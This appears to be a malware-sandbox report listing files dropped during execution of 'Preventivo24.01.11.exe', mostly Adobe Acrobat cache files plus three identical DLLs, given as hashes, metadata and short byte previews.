Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.285971470623371
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfYdPeUkwRe9:YvXKXmiecSnw71yYpW7uOGg8Ukee9
MD5:	510A4D57783A39EB8B829E58E950C0AD
SHA1:	CD4C4D4C770A1C7A2960BBAC47894C306150B041
SHA-256:	1D0FCC71EB6BBBC9DA1824CE4C7DD484CBFC7095BEAA7A7646EAA08F075DD955
SHA-512:	3AF9133AEE0DD3FD5A67C845DA2126F8C7FB1DA9BA50B5FC713E17E360A29E5BBC60698B8C39A80C0ACFD5C06B9B7E46A4493C564E49ACC6D1FA92FE0D987E6D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1395
Entropy (8bit):	5.769472135384075
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71Xiu5rLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNNw:Yv//du5HgDv3W2aYQfgB5OUupHrQ9FJQ
MD5:	A278223C9A33920E8FBD2A5479E4E88A
SHA1:	914F9969ECD2C027A10D8179D72E4AA93A2D7F58
SHA-256:	80566A620E1A78E7CAA1DDDF523EF011A6E2B971E95DF550B6B3403408BEAE3A
SHA-512:	2C63DD4EADB4406B726518D4331064E805C371DC1DB48B8C2300662E834E2D5142B6E062C594EE8301509646F0A15EF62BD4396080015B9CEBD8BF82FF0A7C87
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.2696149843066955
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfbPtdPeUkwRe9:YvXKXmiecSnw71yYpW7uOGDV8Ukee9
MD5:	F9EFD2C3495C58EB56119D86D955EEBA
SHA1:	083226392B90E31FFCA5570EAE989E8D731018C2
SHA-256:	ED23E7A09198D9DC6C8C91710139F878552751F3F43E3AED959F873B0285853A
SHA-512:	E5920C363E68F4EF552D1868F88E4458FAB38CFA3B6D6186EB78ABBDCF8E9CD59B7131EE38540919424B4D42CAF6EEEC25AE77DE3476A206AB883108752E4633
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.2710940277939935
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJf21rPeUkwRe9:YvXKXmiecSnw71yYpW7uOG+16Ukee9
MD5:	36CA86680BA4C37AD67AE2D41F359926
SHA1:	B8414998CEE6234FE921F4FB20A710781E60C135
SHA-256:	D30C8EFC24A86A8E752CE653F3462CD7D2027566F4DF05A37B197E58FE5855C4
SHA-512:	C55598246D0B6189A0E2F181387647B50875B643EE5BDF7D72F5D366EA0269B7F74DB54AE34B187B3C69DEA67A4140934AA7412A836CC61245B24632F163EC6B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	5.712098609894093
Encrypted:	false
SSDEEP:	24:Yv6Xle/w71Xiu7amXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3H6D:Yv//duLBgn5drpTB5OJhr9Q9FJ9H4
MD5:	B59E54D7DCB5A9446CA0A0694DB8B49F
SHA1:	ACBC1FEEAF0B1496993450F70C85B66218AFE2A7
SHA-256:	B7AF85D5B0C10DC25CEAA918D07E0DFE28A106E7337AC37ED85541C4672627C4
SHA-512:	47CFD9FD98F704122C23C1C59EC0EAC8F4B3BC1FDED60522D881A7322685065A994CF3001C98E89F34FD28C8DBCD028D05F77EB952FD202B7712A686230DD1C1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.245362954189138
Encrypted:	false
SSDEEP:	6:YEQXJ2HXmAHecSnw2cE47+FIbRI6XVW7+0Yu0ieoAvJfshHHrPeUkwRe9:YvXKXmiecSnw71yYpW7uOGUUUkee9
MD5:	D4B05E9FFE22D515DDB81792F63126AB
SHA1:	3505ACF7E393C5CB2F84DB9D6B8BEB254312AF2D
SHA-256:	FD0F462B11536F4A0F102DBD2E6EAB411CCF440F0533BC3D9EEFC81845AA3294
SHA-512:	9DE5B783B888241438A93D6E326A0C5B38FB070BEEE88C197B300DE3889DF26735ED20104A7F1134EDC8A331567C0065C6B1A4E3E6CE43167A344B8383BBA9FE
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	5.360722462173854
Encrypted:	false
SSDEEP:	12:YvXKXmiecSnw71yYpW7uOGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uh4:Yv6Xle/w71XiuY168CgEXX5kcIfANh6D
MD5:	80463125399FD4B481509002CEA31AE2
SHA1:	46E17C9D65D8E171EC386A515F6D8A07462D9329
SHA-256:	83714D0EB7C84DCD7C0F953B47A5D99B8E9D98EACF5DFE3BF9B98CF359084D8D
SHA-512:	5148DB29984E2A81881E430EF45B26D7BC871476CCB2F5EA027B23613778C76F134569BD97517B2ABE12947780CF7F8DEE2EF0E5B3113FD8ABD8FA41A3854EC5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7f01f4bf-b9d6-4d13-a9f2-9abe0307f89c","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1706185555252,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1706008090296}}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2818
Entropy (8bit):	5.11074458320386
Encrypted:	false
SSDEEP:	48:YQvKvz0ZMU2HVLL4xv+lDoo5az+SBXMMQx9U4S:C77YvGo7XyPy
MD5:	FFF7B3A3CD20EF4AD6816A2DB47DC65C
SHA1:	3D514611248D687F5A8207A25D9FC0089F6B8FE7
SHA-256:	5AEAB27D38DFDF9B2861F68A53A8782DF5DFADC44A1FDFD759289056A62765AF
SHA-512:	E55583EA1C34F74F9D8284599349AAE3EEF8A465B3BD0AB02AE43B11FA7F5DA1528CE2B50CF0C4AB6FB12F189A903CF52041E95F9F6110E21E1672D0164582A3
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"a9bfc425cf73b2e6b5ad4f8c0648bcf0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008090000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"54894a1acb7bdf324cb9eb0cbec90276","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1706008089000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"87f0d4483be10f980a927ec6377de560","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008089000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"79b83f6fa201e5b5b30ca52bb1941978","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1706008089000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"a8b8094b233546fc01431d6f45768254","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1706008089000},{"id":"Edit_InApp_Aug2020","info":{"dg":"fdda4ee08efc222a95fa7b994418ad66","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.9846494028105754
Encrypted:	false
SSDEEP:	24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Spt4zJwtNBwtNbRZ6bRZ4AF:TVl2GL7ms6ggOVpGzutYtp6P9
MD5:	DAA671367077AA754E3C12508852E9CD
SHA1:	23D280D0F4A94F0D313124DB6FC2AEACBDD4679E
SHA-256:	7CC160511C312AB3426D9304B6EDDCA10E3C16B358857723EAE8892818781B14
SHA-512:	4522C6B7CBAA279E06EA6696051E1DE2301F2A756AD389389C241205AC7833F44C09EF91F5C7B33717557EA920E97EF32FDD6695FFC43BD1B516DEFD34A35ECD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.3382692499713305
Encrypted:	false
SSDEEP:	24:7+t1AD1RZKHs/Ds/SptPzJwtNBwtNbRZ6bRZWf1RZKrpqLBx/XYKQvGJF7ursK:7M1GgOVpdzutYtp6PMkpqll2GL7msK
MD5:	F337C8F983E6F5AA0A8EAF9C2F13A3AD
SHA1:	9D70BE9FE47F9FEE99D743FA416B2B26365CA2F1
SHA-256:	4CCADBF518B6B96337C6A53D0F8CA8657F65988E92C56D7F524E3E50BD1932BE
SHA-512:	A2C1C3F20E4FA2BBBBD447B4F399E5CCC9E31F588F7ECE759D185096EB1AF2B9CE08E48A22EC7CA2CB4B98BC723A9656C93BA276DE38301DAD9548A84DFC3389
Malicious:	false
Preview:	.... .c.....+R.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgm1Juzz29+6Nuc3MxqWHnynCYyu:6a6TZ44ADEm1Oz29+eFcECK
MD5:	36E5CDCDB1A3578AE277B4324B5E5807
SHA1:	EA2A56537043A2B4D1AC50C8736A0D5A2109BA59
SHA-256:	2931420505D7A9B4E1A423B5999371CFA11CA529E162B3A4AC448D03E8CF2BBA
SHA-512:	6E925C11888BCB95933D5B4C8A6C2CB3D1E2C4A91818913545BDAAC6F0D0BF901A1C13A6F137FFCB46CC377D383E1E148794259A925FC2CD5C6BB9DB4136D4E5
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\MSI5406.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI54A3.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: Fatturation110124.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: 1tuL3R5svT.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI54C4.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	756576
Entropy (8bit):	6.616629532136608
Encrypted:	false
SSDEEP:	12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
MD5:	B158D8D605571EA47A238DF5AB43DFAA
SHA1:	BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
SHA-256:	CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
SHA-512:	56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7935f.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5046637269111454
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rpa38lHYlYH:Qw946cPbiOxDlbYnuRK0IEYlYH
MD5:	F06F8574E7B33A5B70644C5C985503F2
SHA1:	9B448591D76FAFC4ADD6D77C64089D7420F99760
SHA-256:	9FF3B38AEF899E8481AEB9F2295CDC8DE7DF1169C49CFF6290023F84E31D9A4E
SHA-512:	F3F857B4857407C116E58937AE98A509C949CCCD0754A49260EF6956D31EADCCDA075EA6397FBC4829C7BD850E301582B8EF1EE53FCB0BC3F5F36B70DB785DAE
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.0.1./.2.0.2.4. . .1.2.:.0.8.:.1.0. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-01-23 12-08-05-283.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.376360055978702
Encrypted:	false
SSDEEP:	384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
MD5:	1336667A75083BF81E2632FABAA88B67
SHA1:	46E40800B27D95DAED0DBB830E0D0BA85C031D40
SHA-256:	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
SHA-512:	D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
Malicious:	false
Preview:	SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.320570156804662
Encrypted:	false
SSDEEP:	384:NJCCkC5fsfWfnfef/A23A2A8AbAKAPAdVOcZolo/obDUDoD1DOD3U+l2+lW+lEX8:NoHEkOv2XD3bHUvIqEEqI6gMZKwFdPIH
MD5:	5C332A13988546F2E0A13F49BDAA5194
SHA1:	7725D2003944FDACA8B36C9035575AEBD919449C
SHA-256:	A68F093F8E9D9CCEC6AE3DF285550BB58ED871B684B158C5850602E2397CF72B
